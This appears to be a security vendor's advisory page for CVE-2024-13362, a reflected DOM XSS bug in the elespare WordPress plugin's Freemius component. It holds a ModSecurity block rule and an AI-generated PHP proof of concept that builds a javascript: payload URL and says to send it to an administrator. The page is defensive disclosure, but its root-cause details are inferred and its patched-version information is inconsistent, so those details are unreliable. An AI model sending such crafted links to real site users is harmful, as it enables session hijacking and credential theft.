What is CVE-2024-13362?

CVE-2024-13362 is a Reflected DOM-Based Cross-Site Scripting (XSS) vulnerability found in the Freemius framework version 2.10.1, embedded in the elespare plugin version 3.3.2. It allows unauthenticated attackers to inject arbitrary web scripts via the url parameter due to insufficient input sanitization and output escaping.

How does this vulnerability work?

The vulnerability works by allowing an attacker to craft a malicious URL that includes a payload in the url parameter. When a user clicks this link, the Freemius JavaScript reads the parameter and injects it into the DOM, executing the script without proper sanitization.

Who is affected by CVE-2024-13362?

Any WordPress site using the elespare plugin version 3.3.2 or earlier is affected by this vulnerability. Administrators can check their plugin version in the WordPress dashboard under the ‘Plugins’ section.

What is the severity level of this vulnerability?

CVE-2024-13362 has a CVSS score of 6.1, categorized as Medium severity. This indicates a moderate risk level, where exploitation could lead to significant impacts such as session hijacking or credential theft, especially if users are tricked into clicking malicious links.

How can I fix CVE-2024-13362?

To fix CVE-2024-13362, update the elespare plugin to version 3.3.4 or later, which includes a patch for this vulnerability. Ensure that the url parameter is properly sanitized and validated before any DOM manipulation occurs.

What are the risks associated with this vulnerability?

Successful exploitation of this vulnerability can allow attackers to execute arbitrary JavaScript in the context of the user’s browser. This could lead to session hijacking, credential theft, or redirection to malicious sites, posing significant risks to users.

What does DOM-Based XSS mean?

DOM-Based XSS refers to a type of cross-site scripting attack where the vulnerability exists in the client-side code rather than the server. It occurs when user input is directly manipulated in the Document Object Model (DOM) without proper sanitization, allowing attackers to inject scripts.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an attacker can create a crafted URL that exploits the vulnerability by including a JavaScript payload. When the user clicks the link, the malicious script executes, showcasing the risk of the vulnerability in a real-world scenario.

What input sanitization measures should be taken?

To prevent similar vulnerabilities, implement strong input sanitization measures such as validating input against an allowlist, using safe DOM APIs, and applying output escaping functions at the point of use. This ensures that any user input is handled securely.

Can this vulnerability be exploited without user interaction?

No, this vulnerability requires user interaction to be exploited. An attacker must trick the user into clicking a crafted link that contains the malicious payload in the url parameter.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the elespare plugin or restricting access to it until a patch can be applied. Educate users about the risks and advise them to avoid clicking on suspicious links.

Where can I find more information about CVE-2024-13362?

More information about CVE-2024-13362 can be found on the official CVE database or security advisories from WordPress security resources. Keeping abreast of security updates and best practices is crucial for maintaining site security.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 10, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (elespare)

CVE ID CVE-2024-13362

Plugin elespare

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 3.3.2

Patched Version —

Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362 (metadata-based):
This is a Reflected DOM-Based Cross-Site Scripting (XSS) vulnerability in the Freemius framework version 2.10.1, which is embedded in the elespare plugin version 3.3.2. An unauthenticated attacker can inject arbitrary web scripts via the url parameter. The CVSS score is 6.1 (Medium), with network attack vector and requiring user interaction.

Root Cause: The vulnerability stems from insufficient input sanitization and output escaping for the url parameter passed to a JavaScript handler. DOM-based XSS occurs client-side when user input reaches an HTML sink (like innerHTML, document.write, eval) without proper encoding. Based on the CWE-79 classification and Freemius’s architecture (which provides licensing and analytics features), the vulnerable code likely reads the url parameter from the URL query string or hash and dynamically injects it into the DOM. Atomic Edge analysis infers this pattern because reflected DOM XSS typically involves reading a GET parameter and writing it directly into the page without server-side escaping.

Exploitation: An attacker crafts a malicious URL containing the payload in the url parameter. For example:
/wp-content/plugins/elespare/freemius/assets/js/index.html?url=javascript:alert(document.domain)
The user must click the crafted link. Freemius’s JavaScript then reads the url parameter and injects it into the DOM via innerHTML or similar sink, executing the script. Since no authentication is required, any user who clicks the link gets compromised.

Remediation: The patch (version 3.3.4) must sanitize the url parameter before using it in DOM manipulation. The fix should validate the url parameter against an allowlist (e.g., only legitimate URLs) and use safe DOM APIs like textContent or setAttribute with proper encoding. Additionally, output escaping functions (esc_js, esc_url) should be applied at the point where the value enters JavaScript.

Impact: Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim’s browser within the WordPress site context. This can lead to session hijacking, credential theft, defacement, or redirection to malicious sites. The attack does not require any privileges, only a click from the targeted user.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

SecRule REQUEST_URI "@rx /wp-content/plugins/elespare/freemius/assets/" 
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 - Freemius Reflected XSS via url parameter',severity:'CRITICAL',tag:'CVE-2024-13362'"
  SecRule ARGS_GET:url "@rx ^javascript:" 
    "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

// This PoC sends a crafted URL to the target and instructs the user to click it.
// Since the vulnerability is DOM-based and requires user interaction,
// the script simulates a malicious link that exploits the elespare plugin's Freemius integration.

$target_url = 'http://example.com'; // CHANGE THIS to the target WordPress site

$payload = 'javascript:alert("CVE-2024-13362")';

// The vulnerable endpoint is likely a Freemius asset file that processes the url parameter.
// Based on the description, the file index.html within Freemius assets reads the url parameter.
$malicious_url = $target_url . '/wp-content/plugins/elespare/freemius/assets/js/index.html?url=' . urlencode($payload);

echo "[+] Atomic Edge CVE-2024-13362 PoCn";
echo "[+] Target: $target_urln";
echo "[+] Crafted malicious URL:n";
echo $malicious_url . "nn";
echo "[+] Send this URL to an administrator or user of the target site.n";
echo "[+] If the vulnerability exists, clicking the link will execute JavaScript in their browser.n";

Frequently Asked Questions

What is CVE-2024-13362?
Overview of the vulnerability
CVE-2024-13362 is a Reflected DOM-Based Cross-Site Scripting (XSS) vulnerability found in the Freemius framework version 2.10.1, embedded in the elespare plugin version 3.3.2. It allows unauthenticated attackers to inject arbitrary web scripts via the url parameter due to insufficient input sanitization and output escaping.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability works by allowing an attacker to craft a malicious URL that includes a payload in the url parameter. When a user clicks this link, the Freemius JavaScript reads the parameter and injects it into the DOM, executing the script without proper sanitization.
Who is affected by CVE-2024-13362?
Identifying vulnerable installations
Any WordPress site using the elespare plugin version 3.3.2 or earlier is affected by this vulnerability. Administrators can check their plugin version in the WordPress dashboard under the ‘Plugins’ section.
What is the severity level of this vulnerability?
Understanding the CVSS score
CVE-2024-13362 has a CVSS score of 6.1, categorized as Medium severity. This indicates a moderate risk level, where exploitation could lead to significant impacts such as session hijacking or credential theft, especially if users are tricked into clicking malicious links.
How can I fix CVE-2024-13362?
Recommended remediation steps
To fix CVE-2024-13362, update the elespare plugin to version 3.3.4 or later, which includes a patch for this vulnerability. Ensure that the url parameter is properly sanitized and validated before any DOM manipulation occurs.
What are the risks associated with this vulnerability?
Potential impacts on users
Successful exploitation of this vulnerability can allow attackers to execute arbitrary JavaScript in the context of the user’s browser. This could lead to session hijacking, credential theft, or redirection to malicious sites, posing significant risks to users.
What does DOM-Based XSS mean?
Technical explanation of the attack type
DOM-Based XSS refers to a type of cross-site scripting attack where the vulnerability exists in the client-side code rather than the server. It occurs when user input is directly manipulated in the Document Object Model (DOM) without proper sanitization, allowing attackers to inject scripts.
How does the proof of concept demonstrate the vulnerability?
Understanding the PoC code
The proof of concept illustrates how an attacker can create a crafted URL that exploits the vulnerability by including a JavaScript payload. When the user clicks the link, the malicious script executes, showcasing the risk of the vulnerability in a real-world scenario.
What input sanitization measures should be taken?
Best practices for prevention
To prevent similar vulnerabilities, implement strong input sanitization measures such as validating input against an allowlist, using safe DOM APIs, and applying output escaping functions at the point of use. This ensures that any user input is handled securely.
Can this vulnerability be exploited without user interaction?
User interaction requirement
No, this vulnerability requires user interaction to be exploited. An attacker must trick the user into clicking a crafted link that contains the malicious payload in the url parameter.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updating is not possible, consider disabling the elespare plugin or restricting access to it until a patch can be applied. Educate users about the risks and advise them to avoid clicking on suspicious links.
Where can I find more information about CVE-2024-13362?
Further resources
More information about CVE-2024-13362 can be found on the official CVE database or security advisories from WordPress security resources. Keeping abreast of security updates and best practices is crucial for maintaining site security.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations